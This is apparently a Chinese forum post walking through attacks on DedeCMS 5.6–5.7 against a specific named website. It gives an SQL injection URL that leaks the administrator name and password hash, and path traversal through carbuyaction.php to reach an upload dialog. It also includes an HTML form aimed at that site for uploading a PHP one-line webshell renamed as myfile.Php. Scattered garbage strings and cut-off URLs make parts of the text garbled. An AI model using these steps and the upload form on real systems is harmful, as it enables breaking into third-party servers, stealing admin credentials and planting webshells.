dedecms5.6-5.7注入与上传漏洞利用

admin

①注入漏洞。
/ Z! d) J+ I2 t3 J这站 http://www.political-security.com/
3 m( |# O) h9 s6 w. i! j首先访问“/data/admin/ver.txt”页面获取系统最后升级时间，
! ?* P& X) N3 u1 F- ?! u0 @www.political-security.com/data/mysql_error_trace.inc 爆后台
  o! h$ r1 U( O3 J% I0 z8 F4 |; w, q然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面，如图说明存在该漏洞。
然后写上语句
查看管理员帐号
; Z" b, R7 U8 k% N5 r) a  Ihttp://www.political-security.co ... &membergroup=@`
7 }" j+ d1 y+ z) q' K" J
& {0 z9 a+ w8 I( ]- h0 _2 R* Oadmin
9 d. Z8 K3 n' ?. {
5 T8 G/ t3 K: o5 T8 i$ c& B& P7 L查看管理员密码
2 u! ~) U, e# }5 N' \0 q/ Y3 b% m　http://www.political-security.co ... &membergroup=@`

8d29b1ef9f8c5a5af429

) D" E1 E* q4 l2 t0 M' Y查看管理员密码
: |( E+ Y9 C7 u7 |8 s
得到的是19位的，去掉前三位和最后一位，得到管理员的16位MD5
& K& k3 x( o& V; g/ V# J4 s4 Y4 }, n% `
8d2
9b1ef9f8c5a5af42
: B+ ~2 ?- P+ |; p9

' W; U; [  S5 T! h, y$ f; vcmd5没解出来 只好测试第二个方法
+ T- }% u+ D4 ]& A8 W6 ~
" I+ z5 f( o) h/ V
. t- U  g2 {2 u! U5 G& [②上传漏洞：
9 ~7 H* q! p( D' p. F0 B" L
( L; U8 e; M; t/ L7 P1 D2 ]" _只要登陆会员中心，然后访问页面链接
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”

/ G( n* u% U3 M如图，说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
: e5 h' A2 `6 P, e' n) \
1 J# }5 q9 a6 x8 A& g* b0 c" l于是将Php一句话木马扩展名改为“rar”等，利用提交页面upload1.htm

<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
或者
" k' o0 R% `$ O5 V8 x" N2 V8 \即可上传成功